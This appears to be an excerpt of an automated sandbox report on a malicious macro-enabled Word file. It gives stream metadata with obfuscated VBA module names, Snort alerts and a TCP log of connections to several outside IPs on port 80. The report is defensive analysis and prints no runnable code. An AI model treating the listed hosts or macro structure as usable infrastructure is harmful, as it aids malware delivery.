Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 524

General
Stream Path:	Macros/PROJECT
File Type:	ASCII text, with CRLF line terminators
Stream Size:	524
Entropy:	5.52955915132
Base64 Encoded:	True
Data ASCII:	I D = " { 9 1 6 F 7 B 9 1 - 5 D 2 F - 4 2 F E - 8 5 A 0 - A 5 1 0 E E 1 5 7 0 3 4 } " . . D o c u m e n t = A 5 g d 2 1 k l f q u 9 c 6 r s / & H 0 0 0 0 0 0 0 0 . . M o d u l e = Z d j t k 4 6 n m 1 7 v o o . . M o d u l e = O w p p n p 8 h a h 4 x o 7 8 8 . . E x e N a m e 3 2 = " F b 5 d 3 b h _ _ k e _ c w 4 p 7 7 " . . N a m e = " m w " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 2 4 2 6 E E C 5 1 6 F E 1 A F E 1 A F E 1 A F E 1
Data Raw:	49 44 3d 22 7b 39 31 36 46 37 42 39 31 2d 35 44 32 46 2d 34 32 46 45 2d 38 35 41 30 2d 41 35 31 30 45 45 31 35 37 30 33 34 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 41 35 67 64 32 31 6b 6c 66 71 75 39 63 36 72 73 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 5a 64 6a 74 6b 34 36 6e 6d 31 37 76 6f 6f 0d 0a 4d 6f 64 75 6c 65 3d 4f 77 70 70 6e 70 38 68 61 68 34 78 6f 37 38

Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 149

General
Stream Path:	Macros/PROJECTwm
File Type:	data
Stream Size:	149
Entropy:	3.96410774314
Base64 Encoded:	False
Data ASCII:	A 5 g d 2 1 k l f q u 9 c 6 r s . A . 5 . g . d . 2 . 1 . k . l . f . q . u . 9 . c . 6 . r . s . . . Z d j t k 4 6 n m 1 7 v o o . Z . d . j . t . k . 4 . 6 . n . m . 1 . 7 . v . o . o . . . O w p p n p 8 h a h 4 x o 7 8 8 . O . w . p . p . n . p . 8 . h . a . h . 4 . x . o . 7 . 8 . 8 . . . . .
Data Raw:	41 35 67 64 32 31 6b 6c 66 71 75 39 63 36 72 73 00 41 00 35 00 67 00 64 00 32 00 31 00 6b 00 6c 00 66 00 71 00 75 00 39 00 63 00 36 00 72 00 73 00 00 00 5a 64 6a 74 6b 34 36 6e 6d 31 37 76 6f 6f 00 5a 00 64 00 6a 00 74 00 6b 00 34 00 36 00 6e 00 6d 00 31 00 37 00 76 00 6f 00 6f 00 00 00 4f 77 70 70 6e 70 38 68 61 68 34 78 6f 37 38 38 00 4f 00 77 00 70 00 70 00 6e 00 70 00 38 00 68

Stream Path: Macros/VBA/_VBA_PROJECT, File Type: data, Stream Size: 5216

General
Stream Path:	Macros/VBA/_VBA_PROJECT
File Type:	data
Stream Size:	5216
Entropy:	5.49741129349
Base64 Encoded:	True
Data ASCII:	. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 1 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 7 . \\ . V . B . E . 7 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F .
Data Raw:	cc 61 97 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 05 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 31 00 23 00

Stream Path: Macros/VBA/dir, File Type: data, Stream Size: 675

General
Stream Path:	Macros/VBA/dir
File Type:	data
Stream Size:	675
Entropy:	6.39671072877
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . 0 * . . . . . p . . H . . " . . d . . . . . m . . 2 . 4 . . @ . . . . . Z = . . . . b . . . . . . . . . { . . a . . . % . J < . . . . . r s t d o l e > . 2 s . . t . d . o . l . . e . . . h . % ^ . . . * \\ G { 0 0 0 2 ` 0 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } . # 2 . 0 # 0 # C . : \\ W i n d o w . s \\ S y s W O W . 6 4 \\ . e 2 . t l . b # O L E A u . t o m a t i o n . . ` . . . . N o r m a . l . E N . C r . m . . a . F . . . . . . . X * \\ C . . . . Q . m . . . . ! O f f i c
Data Raw:	01 9f b2 80 01 00 04 00 00 00 01 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 22 02 00 64 e4 04 04 02 1c 6d a2 a2 32 00 34 00 00 40 02 14 06 02 14 5a 3d 02 0a 07 02 62 01 14 08 06 12 09 01 02 12 7b 1a e4 61 06 00 0c 25 02 4a 3c 02 0a 16 00 01 72 73 74 20 64 6f 6c 65 3e 02 32 73 00 00 74 00 64 00 6f 00 6c 00 a0 65 00 0d 00 68 00 25 5e 00 03 00 2a 5c 47 7b 30 30 30 32 60 30 34 33 30 2d

Stream Path: WordDocument, File Type: data, Stream Size: 21038

General
Stream Path:	WordDocument
File Type:	data
Stream Size:	21038
Entropy:	4.09747048154
Base64 Encoded:	True
Data ASCII:	. . . . _ . . . . . . . . . . . . . . . . . . . . . . . . M . . . . b j b j . . . . . . . . . . . . . . . . . . . . . . . . . . . R . . b . . . b . . . . E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . . . . F . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	ec a5 c1 00 5f c0 09 04 00 00 f8 12 bf 00 00 00 00 00 00 10 00 00 00 00 00 08 00 00 19 4d 00 00 0e 00 62 6a 62 6a 00 15 00 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 04 16 00 2e 52 00 00 62 7f 00 00 62 7f 00 00 19 45 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00 00 00 00 00 ff ff 0f 00 00 00 00 00

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
01/06/21-08:41:31.074932	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.22	8.8.8.8
01/06/21-08:41:32.089687	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.22	8.8.8.8

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 6, 2021 08:41:27.203633070 CET	49167	80	192.168.2.22	104.18.61.59
Jan 6, 2021 08:41:27.249633074 CET	80	49167	104.18.61.59	192.168.2.22
Jan 6, 2021 08:41:27.249722958 CET	49167	80	192.168.2.22	104.18.61.59
Jan 6, 2021 08:41:27.251873016 CET	49167	80	192.168.2.22	104.18.61.59
Jan 6, 2021 08:41:27.297954082 CET	80	49167	104.18.61.59	192.168.2.22
Jan 6, 2021 08:41:27.312448978 CET	80	49167	104.18.61.59	192.168.2.22
Jan 6, 2021 08:41:27.312486887 CET	80	49167	104.18.61.59	192.168.2.22
Jan 6, 2021 08:41:27.312506914 CET	80	49167	104.18.61.59	192.168.2.22
Jan 6, 2021 08:41:27.312525988 CET	80	49167	104.18.61.59	192.168.2.22
Jan 6, 2021 08:41:27.312544107 CET	80	49167	104.18.61.59	192.168.2.22
Jan 6, 2021 08:41:27.312556028 CET	49167	80	192.168.2.22	104.18.61.59
Jan 6, 2021 08:41:27.312582016 CET	49167	80	192.168.2.22	104.18.61.59
Jan 6, 2021 08:41:27.396998882 CET	49168	80	192.168.2.22	104.27.144.251
Jan 6, 2021 08:41:27.447242022 CET	80	49168	104.27.144.251	192.168.2.22
Jan 6, 2021 08:41:27.447485924 CET	49168	80	192.168.2.22	104.27.144.251
Jan 6, 2021 08:41:27.447617054 CET	49168	80	192.168.2.22	104.27.144.251
Jan 6, 2021 08:41:27.497833014 CET	80	49168	104.27.144.251	192.168.2.22
Jan 6, 2021 08:41:27.507673979 CET	80	49168	104.27.144.251	192.168.2.22
Jan 6, 2021 08:41:27.507742882 CET	80	49168	104.27.144.251	192.168.2.22
Jan 6, 2021 08:41:27.507797956 CET	80	49168	104.27.144.251	192.168.2.22
Jan 6, 2021 08:41:27.507854939 CET	80	49168	104.27.144.251	192.168.2.22
Jan 6, 2021 08:41:27.507895947 CET	80	49168	104.27.144.251	192.168.2.22
Jan 6, 2021 08:41:27.508030891 CET	49168	80	192.168.2.22	104.27.144.251
Jan 6, 2021 08:41:27.508068085 CET	49168	80	192.168.2.22	104.27.144.251
Jan 6, 2021 08:41:27.517755985 CET	49167	80	192.168.2.22	104.18.61.59
Jan 6, 2021 08:41:27.684191942 CET	49169	80	192.168.2.22	209.59.139.39
Jan 6, 2021 08:41:27.705226898 CET	49168	80	192.168.2.22	104.27.144.251
Jan 6, 2021 08:41:27.839413881 CET	80	49169	209.59.139.39	192.168.2.22
Jan 6, 2021 08:41:27.839519978 CET	49169	80	192.168.2.22	209.59.139.39
Jan 6, 2021 08:41:27.839674950 CET	49169	80	192.168.2.22	209.59.139.39
Jan 6, 2021 08:41:27.994692087 CET	80	49169	209.59.139.39	192.168.2.22
Jan 6, 2021 08:41:27.995601892 CET	80	49169	209.59.139.39	192.168.2.22
Jan 6, 2021 08:41:27.995629072 CET	80	49169	209.59.139.39	192.168.2.22
Jan 6, 2021 08:41:27.995641947 CET	80	49169	209.59.139.39	192.168.2.22
Jan 6, 2021 08:41:27.995656967 CET	80	49169	209.59.139.39	192.168.2.22
Jan 6, 2021 08:41:27.995670080 CET	80	49169	209.59.139.39	192.168.2.22
Jan 6, 2021 08:41:27.995681047 CET	80	49169	209.59.139.39	192.168.2.22
Jan 6, 2021 08:41:27.995692968 CET	80	49169	209.59.139.39	192.168.2.22
Jan 6, 2021 08:41:27.995697021 CET	49169	80	192.168.2.22	209.59.139.39
Jan 6, 2021 08:41:27.995721102 CET	49169	80	192.168.2.22	209.59.139.39
Jan 6, 2021 08:41:27.995738029 CET	49169	80	192.168.2.22	209.59.139.39
Jan 6, 2021 08:41:27.999214888 CET	49169	80	192.168.2.22	209.59.139.39
Jan 6, 2021 08:41:28.154252052 CET	80	49169	209.59.139.39	192.168.2.22
Jan 6, 2021 08:41:30.762916088 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:31.029351950 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.029537916 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:31.029743910 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:31.296268940 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.311084032 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.311109066 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.311125040 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.311141014 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.311157942 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.311177015 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.311192036 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.311208010 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.311223984 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.311242104 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.311268091 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:31.311311007 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:31.511790037 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:31.577723026 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.577753067 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.577770948 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.577788115 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.577805042 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.577821016 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.577841043 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.577860117 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.577874899 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.577889919 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:31.577889919 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.577908993 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.577919006 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:31.577924013 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.577938080 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.577950001 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.577963114 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:31.577966928 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.577980042 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:31.577989101 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.578001976 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.578012943 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.578094959 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:31.578550100 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:31.778579950 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.778641939 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.778743982 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:31.844686985 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.844733953 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.844758987 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.844785929 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.844810963 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.844835043 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.844857931 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.844875097 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:31.844880104 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.844898939 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:31.844904900 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.844914913 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:31.844933033 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.844958067 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.844966888 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:31.844980955 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.845004082 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.845016003 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:31.845027924 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.845051050 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.845063925 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:31.845072985 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.845094919 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.845104933 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:31.845122099 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.845145941 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.845160007 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:31.845168114 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.845191956 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.845201969 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:31.845215082 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.845238924 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.845249891 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:31.845263004 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.845284939 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.845297098 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:31.845312119 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.845336914 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.845345020 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:31.845355988 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.845376968 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.845400095 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:31.845419884 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.845443964 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.845457077 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:31.845470905 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.845495939 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.845503092 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:31.845519066 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.845542908 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.845551968 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:31.845566988 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:31.845601082 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:31.846071959 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:32.045258999 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.045284986 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.045309067 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.045334101 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.045345068 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:32.045375109 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:32.112301111 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.112333059 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.112426043 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:32.112509012 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.112530947 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.112545013 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.112556934 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.112570047 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.112581015 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.112592936 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.112603903 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.112673044 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:32.112734079 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.112756014 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.112778902 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.112802029 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.112812996 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:32.112827063 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.112844944 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:32.112852097 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.112873077 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.112894058 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:32.112895966 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.112916946 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.112938881 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.112942934 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:32.112961054 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.112982988 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.112992048 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:32.113008022 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.113019943 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:32.113032103 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.113049984 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.113071918 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.113071918 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:32.113094091 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.113112926 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:32.113114119 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.113142014 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.113163948 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.113166094 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:32.113188982 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.113199949 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:32.113214016 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.113234997 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.113253117 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:32.113257885 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.113279104 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.113293886 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:32.113301992 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.113325119 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.113338947 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:32.113347054 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.113373995 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.113398075 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:32.113421917 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.113445997 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.113459110 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:32.113468885 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.113493919 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.113507986 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:32.113517046 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.113552094 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:32.114918947 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:32.311865091 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.311894894 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.311907053 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.311929941 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.312071085 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:32.378695011 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.378735065 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.378752947 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.378787994 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.378806114 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.378822088 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.378865957 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.378876925 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:32.378884077 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.378900051 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:32.378901958 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.378921986 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.378931046 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:32.378968954 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:32.379602909 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.379625082 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.379642010 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.379657984 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.379673004 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.379694939 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.379705906 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:32.379720926 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.379723072 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:32.379739046 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.379759073 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.379766941 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:32.379776955 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.379792929 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.379803896 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:32.379808903 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.379825115 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.379837036 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.379838943 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:32.379853010 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.379859924 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:32.379868984 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.379884005 CET	80	49170	210.86.239.69	192.168.2.22
Jan 6, 2021 08:41:32.379897118 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:32.379934072 CET	49170	80	192.168.2.22	210.86.239.69
Jan 6, 2021 08:41:32.923993111 CET	49170	80	192.168.2.22	210.86.239.69
